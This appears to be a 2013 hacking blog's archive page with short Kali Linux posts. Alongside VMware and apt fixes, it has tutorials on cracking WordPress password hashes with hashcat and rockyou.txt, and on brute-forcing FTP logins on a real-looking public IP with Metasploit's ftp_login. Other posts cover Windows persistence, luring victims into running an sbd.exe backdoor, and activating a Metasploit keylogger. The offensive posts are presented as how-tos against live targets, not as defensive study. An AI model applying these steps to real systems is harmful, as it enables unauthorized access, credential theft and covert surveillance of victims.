Posts

Showing posts from May, 2013

VMware OVF Tool component for Linux [Kali Linux]

Image
Some time ago I installed vmware-player in K-Linux OS and all went smoothly after I install linux headers with command: apt-get install build-essential linux-headers-`uname-r` In the next few days I did the upgrade package, the next I run vmware and vmware-player would not work. then I did a thorough cleaning vmware with the command: vmware-installer-u vmware-player-5.0.2.1031769 Next i trying to installing vmware-player but FILE error appears as shown below: I see on the block, we are prompted to press ENTER to proceed. The next step we do not need to press ENTER key to continue, simply by pressing and holding down SPACE until we find a notice to proceed. Do you agree? [yes/no] : YES Finish step: you have please wait to installing vmware-player Then I run it and it worked very well Happy enjoy ;) Author by: Hidemichi-Hiroyuki a.k.a [H2]

Decrypt MD5 $Wordpress

Image
Hy, I'm back again. I will discuss how to Decrypt a password in the form the MD5 hash wordpress. here are some examples of hash md5 encryption wordpress will we Decrypt: HASH                                                                                  PASS $P$BDHjLCEroc8ujkcs8RZxOhcE80aV5h.           : th3sweety0ne  $P$BPXNfl3mZiO7PZc4XZqFFjX7TyP7Lh.           : Pabl0-saChez $P$BqilSln8PD9SBFuTx8KkaXz62aIIvV/             : m4rim4r123 $P$BnfObieGq5ygdt0OMgwbnKvFt8EFUs.          : Gh0stTrac3 $P$B.RwpJQV8ANOyl19RGHhCaYYgJyvQM1  : *12345*0a0b0c0d many of my friends are overwhelmed when decrypt wordpress md5 hash. so are they wasting their jobs because they could not solve this one password. Equipments: 1. Hashcat             ==> Decrypt Hash 2.  Rockyou.txt       ==> Wordlists 3. Hash-Identifier   ==> to see hash mode Here I use the Operating System Kali Linux. First Step : we see the  kind of hash we will Decrypt. to facilitate us in decryption

How to attack FTP service

Image
FTP atau File Transfer Protocol adalah satu layanan umum di gunakan sebuah server dari webmaster, dan hampir tidak mungkin menemukan layanan ini di sebuah webserver. Equipments: 1. Nmap 2. Metasploit hal yang pertama kita lakukan adalah mencari target, dan disini yang menjadi target saya adalah : 36.86.XX.XX selanjutnya kita menggunakan Nmap untuk melihat port apa saja yg dimiliki ip tersebut. dan disini port yang kita butuhkan adalah : 21 # nmap -A -v 36.86.XX.XX terlihat diatas port yang kita butuhkan terbuka =)) selanjutnya saya mencoba login dengan username: admin dan password: admin upss, ternyata salah =)) selanjutnya mari kita gunakan Metasploit =)) # msfconsole msf > use auxiliary/scanner/ftp/ftp_login  msf auxiliary( ftp_login ) > set RHOSTS 36.86.23.39 RHOSTS => 36.86.23.39 msf auxiliary( ftp_login ) > set PASS_FILE /usr/share/wordlists/rockyou.txt  PASS_FILE => /usr/share/wordlists/rockyou.txt msf auxiliary( ftp_login ) >

[Fixed] error for upgrade - E: Value for APT::Default-Realease

Image
Error for Upgrade : E: The Value '"testing"' is invalid for APT::Default-Release as such a release is not available in the source I think the cause is a word that appears is "testing" after looking at last I can find the word "testing" in a file called apt.conf and is located in the directory /etc/apt / But after that what we have to do, it turns out we just add the line " // " (without the quotes) as below: # echo "//APT::Default-Release “testing”;" > /etc/apt/apt.conf Next. i can tying upgrade =)) that's simple right :) Author By: Hidemichi-Hiroyuki a.k.a [H2]

Nmap strength (Script Nmap)

Image
Seperti yang kita ketahui Nmap merupakan Tools scanner paling ampuh untuk mengetahui layanan sistem operasi, port-port yang terbuka serta jenis paket filter ataupun firewall yang digunakan dan masih banyak lagi, Hasil scanning pun terlihat ketika opsi-opsi yang di perlukan di jalankan. maka dari itu kali ini saya membahas mengenai script yang ada pada nmap =)) disini tools yang kita butuhkan hanyalah Nmap selebihnya pengeksploitasian bisa kalian modifikasikan sendiri. Note : disini saya tidak menggunakan live target, tetapi memanfaatkan localhost untuk pengujian =)) secara sederhana scanning dapat menggunakan.  # nmap ip-target / hosts-target terlihat ada beberapa port yang terbuka, sekarang mari kita melihat lebih jauh lagi =)) # nmap --script=help output akan terlihat sangat banyak maka dari itu untuk menggunakan script yang kita perlukan bisa menggunakan grep seperti contoh kita akan menggunakan scipt ssh (port 22) dengan perintah # nmap --script-help= | gr

[Video] Exploit windows manage persistence

Image
I'm come back again to share method exploitation of windows OS. A few days ago, I tried to exploit a windows operating system. I have managed to get a meterpreter, but it's not working because my victim restart his  machine. I do not want to do the re-exploitation. then I figure out how I made it's  run when the victim relive his computer. next, I then managed to get back meterpreter =)) you can see my video below how do i do it. 

[Video] Exploit SBD Executable

Image
Connect to the victim just the wine to call file sbd.exe Equipments: 1. Metasploit "msfpayload & msfcli" 2. Apache2 3. Wine 4. Sbd.exe " Download " Use creativity and art in the exploitation to lure victims into the trap =)) Author By: Hidemichi-Hiroyuki a.k.a [H2]

[Video] Activate Keylogger Using Metasploit - PART 2

Image
After successfully with keylogger part 1 , I will give the new section of the next keylogger. Note : we have to get meterpreter session to run keylogger. Check this for video. Created By: Hidemichi-Hiroyuki a.k.a [H2]